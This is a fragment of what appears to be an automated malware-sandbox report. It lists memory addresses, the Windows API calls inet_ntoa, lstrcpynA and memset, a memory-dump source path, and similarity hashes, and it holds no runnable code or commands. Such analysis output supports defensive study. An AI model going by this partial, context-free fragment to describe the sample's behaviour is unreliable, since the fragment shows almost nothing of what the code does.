                                                                                                                                                                                                0x00af1aea
                                                                                                                                                                                                0x00af1aea
                                                                                                                                                                                                0x00af1aec
                                                                                                                                                                                                0x00af1aee
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af1af0
                                                                                                                                                                                                0x00af1af1
                                                                                                                                                                                                0x00af1af4
                                                                                                                                                                                                0x00af1af7
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af1af7
                                                                                                                                                                                                0x00af1af9
                                                                                                                                                                                                0x00af1af9
                                                                                                                                                                                                0x00af1af9
                                                                                                                                                                                                0x00af1b03
                                                                                                                                                                                                0x00af1b09
                                                                                                                                                                                                0x00af1b0a
                                                                                                                                                                                                0x00af1b0c
                                                                                                                                                                                                0x00af1b0f
                                                                                                                                                                                                0x00af1a7c
                                                                                                                                                                                                0x00af1a7c
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af1a7c
                                                                                                                                                                                                0x00af1a7a
                                                                                                                                                                                                0x00af1b15

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • inet_ntoa.WS2_32(00000004), ref: 00AF1AC4
                                                                                                                                                                                                • lstrcpynA.KERNEL32(?,00000000), ref: 00AF1ACF
                                                                                                                                                                                                  • Part of subcall function 00AF96AB: memset.MSVCRT ref: 00AF96D4
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: inet_ntoalstrcpynmemset
                                                                                                                                                                                                • String ID: @}3u
                                                                                                                                                                                                • API String ID: 129148211-847092897
                                                                                                                                                                                                • Opcode ID: 03ff665f268579519a230c0fcf97fdedae276ecfd6d76f8f5424e134ff93c5b6
                                                                                                                                                                                                • Instruction ID: 326903f45c1d2d3fad2ea630adf283b232abc7cde1ce077791de7f8956d9272f
                                                                                                                                                                                                • Opcode Fuzzy Hash: 03ff665f268579519a230c0fcf97fdedae276ecfd6d76f8f5424e134ff93c5b6
                                                                                                                                                                                                • Instruction Fuzzy Hash: 8C31E576E0121EEBDB15EBE4E9809BEB7B5FB44350B24455AF610AB280DF31DE40CB94
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%